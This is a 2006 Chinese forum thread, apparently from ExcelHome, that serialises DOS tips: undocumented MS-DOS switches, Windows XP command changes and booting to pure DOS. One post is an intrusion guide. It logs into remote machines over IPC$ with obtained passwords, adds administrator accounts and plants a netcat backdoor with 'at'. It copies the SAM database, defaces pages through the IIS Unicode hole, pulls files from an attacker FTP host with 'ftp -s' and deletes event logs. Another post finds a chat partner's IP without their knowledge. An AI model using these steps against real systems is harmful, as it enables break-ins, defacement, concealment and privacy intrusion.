ExcelHome技术论坛

 找回密码
 免费注册

QQ登录

只需一步,快速开始

快捷登录

搜索
EH技术汇-专业的职场技能充电站 妙哉!函数段子手趣味讲函数 Excel服务器-会Excel,做管理系统 效率神器,一键搞定繁琐工作
HR薪酬管理数字化实战 Excel 2021函数公式学习大典 Excel数据透视表实战秘技 打造核心竞争力的职场宝典
让更多数据处理,一键完成 数据工作者的案头书 免费直播课集锦 ExcelHome出品 - VBA代码宝免费下载
用ChatGPT与VBA一键搞定Excel WPS表格从入门到精通 Excel VBA经典代码实践指南
楼主: andysky

[分享]想学习DOS的请进来-----DOS连载

[复制链接]

TA的精华主题

TA的得分主题

发表于 2006-12-15 09:35 | 显示全部楼层
谢谢andysky兄分享!收藏学习了.

TA的精华主题

TA的得分主题

 楼主| 发表于 2006-12-15 09:55 | 显示全部楼层

DOS未公开的命令集

dos系统中有许多未公开的命令与参数。我经过收集整理,发现了很多。由于dos的有好几种,所以下面仅以ms-dos为例,介绍一下常用命令中的未公开的命令与参数。经过比较,我发现在ms-dos的各版本中,7.x版中的未公开命令与参数是最多的,这些7.x版本中的未公开命令与参数在其它dos版本中通常是没有的,但却是非常实用的,例如command /z命令,这是用dos自带的命令显示errorlevel(错误返回代码)值的唯一方法(当然,用其它的附加工具,如err2env等也可以做到)。

dos未公开命令:

truename:用于显示实际的路径,对subst等命令很有用。
installhigh:用在config.sys中,将文件调入umb。
logo和comment:仅用在dos7中的config.sys中,用法未知。

dos未公开参数:

command /f 使fail作为abort,retry,fail中的默认选项。
command /d 在dos5中是禁止autoexec.bat自动执行;在6.0+版本中是禁止/f参数。
command /z 显示errorlevel(错误返回代码)信息。
command /t 在dos7.x中强制将command.com永久性调入常规内存。

format /autotest 自动完成格式化过程。
format /backup 自动完成格式化过程,并提示输入卷标。
format /select 只在磁盘上备份系统区数据,相当于mirror程序。
format /select /u 将引导区和文件分配表用f6h填之。
format /z:n 设置fat32分区上的簇大小。

fdisk /mbr 重写硬盘主引导记录。
fdisk /cmbr drive 重写指定驱动器上的主引导记录。
fdisk /pri:size 创建主分区。
fdisk /ext:size 创建扩展分区。
fdisk /log:size 在扩展分区上创建逻辑驱动器。
fdisk /prmt|/q 提示行动/安静模式。
fdisk /partn 将分区表信息保存到partsav.fil中。
fdisk /actok 用于dos7中,跳过完整性测试。
fdisk /fprmt 用于dos7中,自动采用fat32,并跳过提示信息。

doskey /appedit 使doskey也应用于其它程序(如debug等)中。
doskey /command和/permanent和/scrsize和/xhistory 用法未知。

scandisk /clip 用于dos7中,将长文件名剪为短文件名。
scandisk /nolost 用于dos7中,不提示表面测试或丢失簇。
scandisk /noui和/text 用于dos7中,使用标准的dos界面。
scandisk /mount 相当于scandisk.ini中的mount=always。
scandisk /time 相当于scandisk.ini中的scantimeout=on。

qbasic /qhelp 进入dos6的全屏幕帮助系统,相当于执行help命令。
qbasic /edcom 进入dos6的文件编辑器,相当于执行edit命令。

mem /a或mem /all 显示hma信息。

ver /r 显示扩展的版本信息。

dir /z 用于dos7中,表示不显示长文件名。

dos=single 用在dos7中的config.sys中,启动单一模式的dos。

device=himem.sys /q 当himem.sys加载时使用安静模式。

device=emm386.exe notr 不要检测token ring网络适配器。

dos未公开用法:

if exist xmmxxxx0 ... 此命令可以判断当前是否安装了himem.sys驱动程序。
if exist emmxxxx0 ... 此命令则用来判断当前是否安装了emm386驱动程序。

dir , 用在dos7以前的版中中,显示所有文件,相当于dir /a。

:: 此符号可在批处理文件中代替rem注解命令,可以加快运行速度。

以上是ms-dos中的未公开命令与参数,其中有些是非常实用的,大家不妨一试

TA的精华主题

TA的得分主题

 楼主| 发表于 2006-12-15 10:01 | 显示全部楼层
[广告] VBA代码宝 - VBA编程加强工具 · VBA代码随查随用  · 内置多项VBA编程加强工具       ★ 免费下载 ★      ★使用手册

DOS中的几个危险命令

1、format磁盘格式化命令
   由于format命令可格式化已使用的磁盘,从而可将磁盘上的所有文件删除掉,因此,在使用本命令前,应先用dir命令检查磁盘上的内容是否需保留。另外应注意防止由于命令输入的错误而误对磁盘进行格式化。
   2、diskcopy磁盘复制命令
   本命令复制时不管目的盘是否已存放信息,都一律重新格式化目的盘为与源盘相同的格式。因此,使用本命令时,一方面应检查目的盘上有无有用文件,另一方面也应防止将源盘和目的盘搞错,而将源盘格式化。可在复制前,先将源盘进行写保护。
   3、backup磁盘备份命令
   在使用本命令前,若不使用参数/a,将会删除目的盘上的原有文件。因此,在备份前应先检查目的盘的内容是否有用,或者使用参数/a进行备份。
   4、del删除文件命令
   由于本命令可使用通配符*和?来删除一批文件,因此为避免误删大批文件,建议在使用本命令前先用dir命令查看所删文件是否正确。然后再执行本命令。
   5、copy文件复制命令
   由于copy命令在复制文件时,将会把目的盘上的原有同名文件覆盖掉,因此,在命名目的文件名时,应保证不与目的盘上的原有文件同名。

TA的精华主题

TA的得分主题

 楼主| 发表于 2006-12-15 10:01 | 显示全部楼层

WIN XP中的DOS增强功能

“廉颇老矣,尚能饭否”,这是很多人对Windows操作系统下的DOS 的一种偏见,其实DOS在系统维护工作中有着重要的作用。自从微软公司推出Windows XP操作系统后, 人们热情的投入到Win XP的怀抱中去关注它、了解它、使用它,却很少有人注意到Win XP附带的DOS操作环境,实际上Win XP已经增加了部分DOS命令的功能,所谓“老树开新花”,下面让我们一道来感受Win XP下DOS的功能变化。
◆命令:DIR,列文件、目录
增加参数:/-C
参数说明:DIR列文件、目录时显示的文件大小,其数值以千为单位进行分隔,使用此参数即“DIR/-C”将取消显示中的分隔符,以满足部分人的视觉习惯。
增加参数:/Q
参数说明:Windows是多用户操作系统,使用此参数即“DIR /Q”列文件、目录时,将显示出文件、目录的用户属性。
增加参数:/T:C、/T:A、/T:W
参数说明:使用此参数即“DIR/T:C”、“DIR/T:A”、“DIR/T:W”分别显示文件、目录的创建时间、上次访问时间和上次修改时间。
增加参数:/X
参数说明:使用此参数即“DIR/X”列文件、目录时,会对长文件名同时显示“8.3”格式的文件名。

◆命令:CD,改变目录
增加参数:/D
参数说明:此参数的作用是快速改变当前目录,比如当前目录是C:\Windows,使用命令“CD/D E:\Tools”可快速切换到E:\Tools目录下。注:只有在Win XP的“运行”文本框中输入“CMD”得到的DOS窗口中才能使用此参数。

◆命令:MD,建立目录
功能说明:此命令并未增加参数,但是增强了功能,它可一次建立多级子目录, 例如使用命令“MD AA\BB\CC\DD”将一次性创建AA、BB、CC、DD四级子目录。而在老版本的DOS中,若不存在AA子目录,便无法直接建立AA下的BB等深层子目录。

◆命令:RD,删除目录
增加参数:/S
参数说明:使用此参数即“RD/S”用于删除目录树,即删除目录及目录下的所有子目录和文件,相当于以前版本中的DELTREE命令。
增加参数:/Q
参数说明:使用上面的/S参数删除目录树时,系统会要求用户确认是否真的要删除。若同时使用/Q参数即“RD/S /Q”,在进行删除操作时将取消确认,相当于DELTREE命令的/Y参数。

◆命令:DEL,删除文件或目录
增加参数:/F
参数说明:使用此参数即“DEL/F”可删除只读文件。
增加参数:/S、/Q
参数说明:使用此参数即“DEL/S”作用与“RD/S”完全相同,即删除目录及目录下的所有子目录和文件。同时使用参数/Q,可取消删除操作时的系统确认。
增加参数:/A
参数说明:删除指定属性或指定属性以外的文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件。

◆命令:ATTRIB,更改文件或目录的属性
增加参数:/D
参数说明:在Win XP中我们不能把文件或文件夹设置为系统属性,只能设为只读、隐藏或存档属性。而带参数/D使用ATTRIB命令可以对文件的所有属性进行设定,设定时必须与参数/S同时使用。例如“ATTRIB /S /D +S D:\Study”,作用是将D:\Study文件夹设置为系统文件夹。

◆命令:Format,格式化磁盘
增加参数:/FS:filessystem
参数说明:按指定文件系统类型(FAT、FAT32、NTFS)格式化磁盘,例如“Format /FS:NTFS”。

◆命令:DATE、TIME,显示系统日期和时间
增加参数:/T
参数说明:使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间。

TA的精华主题

TA的得分主题

 楼主| 发表于 2006-12-15 10:06 | 显示全部楼层

WIN XP下如何用纯DOS?

有时我们不得不使用一些在纯DOS模式下工作的程序,但是在Windows XP中已经找不到纯DOS了,难道我们非得放弃这些在纯DOS下运行的程序吗?当然不是!利用下面的办法就可以让你在Windows XP中进入纯DOS模式。

   第一种方法:利用Win98

   在我们安装XP*作系统前,先用Windows 98启动盘启动系统,并通过sys c:命令向c盘传送系统。并将常用的DOS命令拷贝到硬盘中,然后按常规方法安装XP,当安装成功后,在启动菜单的默认菜单"Microsoft Windows XP"下会新增一个“Microsoft Windows”菜单项,选中此菜单项后,由于系统中没有安装Windows98系统,所以此时计算机就会自动转到DOS系统下,而且还是实模式的,这样就达到了我们的目的。

   第二种方法:采用start命令

   在Windows XP的命令解释符中输入:start/seperate要运行的程序,即可运行相应的DOS程序。其中参数separate的作用是在单独的内存空间启动16位程序,而用参数shared则是在共享的内存空间启动16位程序。当DOS程序运行后我们还可按Alt+Enter键在全屏幕与窗口之间进行切换。

   第三种方法:利用工具软件

   我们还可以使用一个小工具pqvf.exe来达到目的。该软件是部分网友分析了PQ Magic的相关文件,并提取了部分文件制作的软件,可以让那些Windows XP用户迅速引导到纯DOS下,重新启动后又可以正常使用Windows XP启动。

   下载后的pqvf.exe文件是一个自解压程序,解压后的文件名字和作用如下:MBR.dat和restrmbr.exe这两个文件的主要作用是用来恢复硬盘的主引导记录的,作用与执行FDISK/mbr命令一样,可以清除主引导扇区而不改变分区表结构。Vfinst9x.exe用于在Windows 9x下启动纯DOS界面,VfinstNT.exe用于在Windows XP下启动纯DOS界面。pqvf.vfd中则包含有启动的软磁盘映像文件。

   具体方法是:直接运行VfinstNT.exe,vfinstNT.exe文件,它们会修改硬盘主引导记录,然后Windows XP会自动重新启动,重启动后你看到的盘符将是A:。敲入ver命令可以查看当前的DOS版本,显示的是“Windows 98(version 4.10.2222)”,看来已是纯DOS了!而且像himem.sys.emm386.exe、光驱驱动和鼠标驱动程序这样的必备驱动也安装了,并且还自动装上一个简单的汉字系统,完全可以应付一般的DOS应用了。如果想回到Windows XP界面,只要重新启动计算机就可以了。

还可以装vfloppy (虚拟软驱)具体方法可以参照软件的说明,重新启动后,会出现双菜单,其中一个就是从虚拟软驱启动到dos。

TA的精华主题

TA的得分主题

 楼主| 发表于 2006-12-15 10:13 | 显示全部楼层
[广告] Excel易用宝 - 提升Excel的操作效率 · Excel / WPS表格插件       ★免费下载 ★       ★ 使用帮助

DOS下msdos.sys文件的配置方案

在ms-dos 6.22及以下版本中,msdos.sys是一个非常重要的启动文件。不过,到了ms-dos 7.0以上版本中,msdos.sys变成了一个设置文件,但仍有较大的作用。现在介绍一下msdos.sys文件中[options]项中的一些设置。

   autoscan:非正常关机后下次启动是否运行 scandisk。

   bootdelay:开机时热键按下前的等待时间(单位:秒)。

   bootgui:启动时是否进入windows的gui界面(否则为纯ms-dos方式)。

   bootkeys:启动时热键是否有效。

   bootmenu:启动时是否显示启动菜单(否则要按下热键才显示)。

   bootmenudefault:显示启动菜单时的默认项(即光标所在项)。

   bootmulti:是否允许启动其它的ms-dos版本(如6.xx)。

   bootwarn:在启动过程中失败后,下次启动是否提示进入安全模式。

   bootwin:启动时是否自动装入旧版ms-dos。

   dblspace:启动时是否装入 dblspace.bin。

   doublebuffer:是否启动双缓冲区支持。

   drvspace:启动时是否装入 drvspace.bin。

   loadtop:启动时是否将系统核心的一部分装入高端内存umb。

   logo:启动时是否显示windows的“蓝天白云”启动画面。

   winver:设置windows的版本。


   下面说一说启动热键:

   f4:启动旧版dos。

   shift+f4/shift:安全模式。

   f5:跳过config.sys和autoexec.bat,但自动装入himem.sys等。

   alt+f5:command prompt only。

   shift+f5:safe mode command prompt only。

f8:显示启动菜单。

TA的精华主题

TA的得分主题

 楼主| 发表于 2006-12-15 10:15 | 显示全部楼层
DOS命令查看QQ好友IP地址

查qq好友ip地址还用得着这么麻烦吗?给qq打个补丁不就行了吗?不错,这样做是很简单,但是如果是新出的qq,“补丁”还没有做出来那又该怎么办呢?用ipsniper等软件呗,如果手头上没有又急着查又该怎么办呢?***梢杂闷渌?砑??确剿怠??昧耍?道此等ザ家?鹑说娜砑???裁床皇允詃os命令呢?即简单,又方便,还很环保(不像应用软件还得另外安装占用硬盘空间,使用时还占用相同资源)。

   不多啰嗦了,正式开始。 首先,用甜言蜜语、糖衣炮弹之类的武器把你想知道ip地址的那个人“请”到qq的“二人世界”里。接着,我们在dos窗口里(win9x下叫dos,win2000下叫命令提示符)。输入如下命令:

   netstat -n

   你将看到:

   active connections
   proto   local address   foreign address    state
   tcp  202.109.34.78:1200  202.121.139.35:61555  established
   tcp  202.109.34.78:2694  202.109.72.40:6667   established
   tcp  202.109.34.78:4869  211.202.1.227:23    established

   好家伙,这么多ip!哪个才是我们要找的呢?别着急,往后看。我们现在退出“二人世界”,然后在dos下再输入一次:

   netstat -n

   你将看到:

   active connections
   proto   local address    foreign address    state
   tcp   202.109.34.78:1200  202.121.139.35:61555  time_wait
   tcp   202.109.34.78:2694  202.109.72.40:6667   established
   tcp   202.109.34.78:4869  211.202.1.227:23    established

   看出前后两次的区别了吗?没有看出来?仔细着看,你会发现:

   原来:tcp 202.109.34.78:1200 202.121.139.35:61555 established
   现在:tcp 202.109.34.78:1200 202.121.139.35:61555 time_wait

   好了,现在你该知道了吧?对!和你聊天的人的ip就是:202.101.139.35!那你是怎么知道的呢?朋友,请看我们在“二人世界”时要传送消息,相互之间必然要产生连接(通过udp协议),此时自然是“established”了(以你用netstat -n命令的结果来说);而退出“二人世界”连接就断开了,自然就是“time_wait”了。

   很简单吧?用这种方法一个外来软件也没有用(netstat是windows自带外部命令),是不是向我们前面所说的那样即简单又方便,还很环保?还不快试试!

TA的精华主题

TA的得分主题

 楼主| 发表于 2006-12-15 10:16 | 显示全部楼层

DOS下的网络命令

一般入侵所需要的几个常用命令 一般入侵所需要的几个常用命令

如果写得不好别笑啊。我觉得写这些更有用,不会像其他人一样写一些很无聊不现实的文章。当然这只是我的想法,我也有缺点的。

1:NET

只要你拥有某IP的用户名和密码,那就用IPC$做连接吧!

这里我们假如你得到的用户是hbx,密码是123456。假设对方IP为127.0.0.1

net use \\127.0.0.1\ipc$ "123456" /user:"hbx"

退出的命令是

net use \\127.0.0.1\ipc$ /delte

下面的*作你必须登陆后才可以用.登陆的方法就在上面.

----------------------

下面我们讲怎么创建一个用户,由于SA的权限相当于系统的超级用户.

我们加一个heibai的用户密码为lovechina

net user heibai lovechina /add

只要显示命令成功,那么我们可以把他加入Administrator组了.

net localgroup Administrators heibai /add

----------------------

这里是讲映射对方的C盘,当然其他盘也可以,只要存在就行了.我们这里把对方的C盘映射到本地的Z盘.

net use z:\\127.0.0.1\c$

----------------------

net start telnet

这样可以打开对方的TELNET服务.

----------------------

这里是将Guest用户激活,guest是NT的默认用户,而且无法删除呢?不知道是否这样,我的2000就是删除不了它。

net user guest /active:yes

----------------------

这里是把一个用户的密码改掉,我们把guest的密码改为lovechina,其他用户也可以的。只要有权限就行了呀!

net user guest lovechina

net命令果然强大啊!

2:at

一般一个入侵者入侵后都会留下后门,也就是种木马了,你把木马传了上去,怎么启动他呢?

那么需要用AT命令,这里假设你已经登陆了那个服务器。

你首先要得到对方的时间,

net time \\127.0.0.1

将会返回一个时间,这里假设时间为12:1,现在需要新建一个作业,其ID=1

at \\127.0.0.1 12:3 nc.exe

这里假设了一个木马,名为NC.EXE,这个东西要在对方服务器上.

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它是一个TELNET服务,端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

3:telnet

这个命令非常实用,它可以与远方做连接,不过正常下需要密码、用户,不过你给对方种了木马,直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也就是肉鸡.

4:FTP

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空间,国内多的是,如果真的找不到,我给个
http://WWW.51.NET,

不错的.当我们申请完后,它会给用户名,密码,以及FTP服务器.

在上传前需要登陆先,这里我们假设FTP服务器是
http://WWW.51.NET,

用户名是HUCJS,密码是654321

ftp www.51.net

他会要求输入用户,成功后会要求输入密码.

----------------------

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对方D:\

get c:\index.htm d:\

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下

put c:\index.htm d:\

5:copy

下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

copy index.htm \\127.0.0.1\c$\index.htm

----------------------

如果你要复制到D盘下把C改为D,就行了!

copy index.htm \\127.0.0.1\d$\index.htm

----------------------

如果你要把他复制到WINNT目录里

就要把输入

copy index.htm \\127.0.0.1\admin$\index.htm

admin$是winnt

----------------------

要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名

下面就把127.0.0.1的数据库复制到本地C盘下

copy \\127.0.0.1\admin$\repair\sam._ c:\

----------------------

6:set

如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!

下面是我得到的结果!我来分析它,只是找主页在那而已。

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
HTTP_ACCEPT_ENCODING=gzip, deflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
s cript_NAME=/s cripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。

7:nbtstat

如果你扫到一部NT的机子,他的136到139其中一个端口开了的话,就要用这个命令得到用户了。顺便告诉大家这是netbios,得到用户名后就可以猜猜密码了。例如比较简单的密码,密码和用户名一样的,都试下,不行就暴力破解吧!

现在网上很多NT的机子都开了这些端口的,你可以练习下,我们来分析得到的结果。

命令是

nbtstat -A XX.XX.XX.XX

-A一定要大写哦。

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
Registered Registered Registered Registered Registered Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP

粉红色的就是登陆过这部系统的用户,可能你不知道怎么看,大家是不是看到了一窜数字,只要这窜数字是<03>的话,那他前面的就是用户。

这里的用户是PENTIUMII。

8:Shutdown

关了对方的NT服务器的命令

Shutdown \\IP地址 t:20

20秒后将NT自动关闭,三思后才能运行这个命令,这样对对方造很大的损失,要做个有良心的入侵者呀。

9:DIR

这个命令没什么好讲,但是却非常重要,他是查看一目录里的所有文件、文件夹。

你可以本地试下。

10:echo

著名的漏洞Unicode,这个命令可以简单的黑一下有这个漏洞的主机。

我们假设我们要把“南京大屠杀铁证如山,任何日本人不得抵赖!”写入index.htm,有2种方法,大家看看有什么区别。

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>index.htm

echo 南京大屠杀铁证如山,任何日本人不得抵赖!>>index.htm

第一个的意思是覆盖index.htm原有的内容,把“南京大屠杀铁证如山,任何日本人不得抵赖!”写进index.htm。

第二个的意思是把“南京大屠杀铁证如山,任何日本人不得抵赖!”加到index.htm里面。

“>>”产生的内容将追加进文件中,“>”则将原文件内容覆盖。

大家可以本地试下。

可能你会问,这样简单黑下有什么好玩的,其实他可以用来下载主页到对方的目录里。

1、首先,我们需要申请一个免费的主页空间。

2、用echo在可写目录下建立如下内容的txt文件:(以chinren服务器为例。)
open upload.chinaren.com(你的FTP服务器,申请时你的空间提供商会给你的)
cnhack(你申请时的用户名)
test(你申请时的密码)
get index.htm c:\inetpub\wwwroot\index.htm(这里是把你空间上的index.htm下载到对方的c:\inetpub\wwwroot\index.htm)
bye(退出FTP对话,相当在98下的DOS,用EXIT退出DOS)

具体的做法:
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt (利用ftp的-s参数,执行文件里的内容。)

等命令完成时,文件已经下载到你指定的文件里了。

注意:取得文件后,请删除cnhack.txt。(如果不删除,很容易会给别人看到你的密码。)

记得要 del c:\cnhack.txt

11:attrib

这个命令是设置文件属性的。如果你想黑一个站,而他的主页的文件属性设置了只读,那就很可怜呀,想删除他也不行,想覆盖他也不行。倒!不过有这个命令就别怕了。

attrib -r index.htm

这个命令是把index.htm的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

----------------------

attrib +r index.htm

这个命令是把index.htm的属性设置为只读。

12:del

当你看到这个标题可别倒下啊!现在要离开127.0.0.1了,要删除日志,当然要删除日志啦!想被捉吗。呵呵。

NT的日志有这些

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

只要删除这些就可以了。有些系统NT安装在D盘或其他盘,就要把C改成其他盘

[此贴子已经被作者于2006-12-15 10:30:43编辑过]

TA的精华主题

TA的得分主题

 楼主| 发表于 2006-12-15 10:27 | 显示全部楼层
[广告] VBA代码宝 - VBA编程加强工具 · VBA代码随查随用  · 内置多项VBA编程加强工具       ★ 免费下载 ★      ★使用手册
DOS下快速重启、关机有妙方

很多时候我们要将系统切换到DOS状态下工作,如删除一些顽固文件,对系统进行优化等等。但是DOS下没有给用户提供重新启动计算机和关闭计算机的命令。用户要重新启动,要么同时按下“Ctrl+Alt+Del”组合键实现热启动,要么按机箱面板上的“Reset”复位键来重新启动;要关机只能按钮主机箱面板上的“Power”按钮。每次都要低头、弯腰在主机箱面板上摸索,十分的辛苦且繁琐。笔者今天给各位提供另外一种方法,以免各位低头弯腰之苦。

用资源管理器打开Windows98安装光盘,找到位于“X?\Windows\Command\EBD”目录下?X是光驱的盘符,请自行修改?的“restart.com”程序文件,把它拷贝到系统所在分区的“C?\WINDOWS\COMMAND”目录下。以后要在DOS下重新启动电脑,只需要输入“restart”就可以了。关机则就更简单了,直接在DOS提示符后键入 win /z,屏幕上会提示“按任意键继续”的英文提示,你按一下任意键试试?^_^?是不是关机了!

TA的精华主题

TA的得分主题

 楼主| 发表于 2006-12-15 10:37 | 显示全部楼层

在纯DOS下显示中文信息

很多用户在windows中建立文件夹或文件时喜欢用中文命名。不过,当你的windows由于发生故障无法进入,需要格式化硬盘重新安装系统时,你会发现麻烦来了:由于需要先在纯dos下备份文件(夹)的内容,但在默认情况下纯dos并不支持中文,因此运行dir命令后出现在面前的是一堆乱码,根本无法进行复制。不过不要着急,今天我就教大家两个方法,让dos下的“乱码”不乱:


??1. 自力更生法

??其实从windows 95开始,微软就在相应的dos版本中内置了中文系统和四种中文输入法(拼音、双拼、国标、区位)。引导电脑进入纯dos后,在命令提示符后键入pdos95后回车,系统会自动运行pbios.exe并加载中文字体驱动和输入法,如果加载成功会在屏幕的右下角出现“win95中文dos状态”的提示。这时候在纯dos下就可以显示并输入16×16点阵的汉字,运行dir命令,原来的乱码就不见了!输入法通过ctrl+shift组合键来切换 ,对于长文件名需要输入“~”字符时,要注意切换回英文方式(注意:中文系统的加载是通过c:\windows\command\下的pbios.exe、font16.exe、hzvio95.exe等文件来实现的,如果你系统中没有这些文件或已经损坏,则无法实现对中文的支持和输入,你可以按照屏幕的提示从其他电脑上将这些文件复制到相应的位置即可解决问题)。

??2. 借用外力法

??“自力更生法”输入中文需要保证相应的系统文件完好,如果这几个文件受损,那么汉字系统将无法加载。不过我们可以通过软件来帮忙:mousclip(下载地址:http://firststep.ahwww.com/dosware/ctmous19.zip)是一款鼠标增强驱动程序,它可以在dos下驱动各种串口和ps/2鼠标,这样你就可以用鼠标在屏幕上进行文字的复制/粘贴了。在加载mousclip之前,先加载鼠标驱动程序(http://www.liaokai.com/dos/mouse,大小只有8kb),再运行mousclip.exe。此时你会在屏幕上看到一个可移动的鼠标提示符,执行rename(格式为“rename 乱码文件 新文件名”)命令→按住左键选择要复制的文件夹→将鼠标移动到格式中的“乱码文件”处→单击右键→输入新的文件名即可。

??3. 使用心得

??(1)由于纯dos不支持ntfs分区,如果要对这类分区进行*作可以去下载ntfs for dos这个软件(http://firststep.ahwww.com/dosware/ ntfsdos.zip.)。

??(2)mousclip对执行对象的复制或粘贴是屏幕能显示的任何字符(当然包括乱码,也可以用于怪异号码的输入)。

??(3)在“借用外力法”中,如果因为文件夹数目很多导致要复制的乱码无法在当前屏幕上显示,我们可以使用“dir/p”命令分页显示。

??(4)在dos下文件名长度不能超过8个字符,所以即使通过加载pdos95方法修正乱码,可能还是无法找对文件,因为仍然只能显示8个字符(4个汉字)。解决办法一是尽量将文件夹名称控制8个字符内,二是加载dos的较高版本,如dos 7.1版(http://newdos.yginfo.net/dosware/mdos71bd.zip),它们一般都支持中文、长文件名、ntfs分区、鼠标等。

您需要登录后才可以回帖 登录 | 免费注册

本版积分规则

手机版|关于我们|联系我们|ExcelHome

GMT+8, 2024-11-16 05:25 , Processed in 0.032944 second(s), 6 queries , Gzip On, MemCache On.

Powered by Discuz! X3.4

© 1999-2023 Wooffice Inc.

沪公网安备 31011702000001号 沪ICP备11019229号-2

本论坛言论纯属发表者个人意见,任何违反国家相关法律的言论,本站将协助国家相关部门追究发言者责任!     本站特聘法律顾问:李志群律师

快速回复 返回顶部 返回列表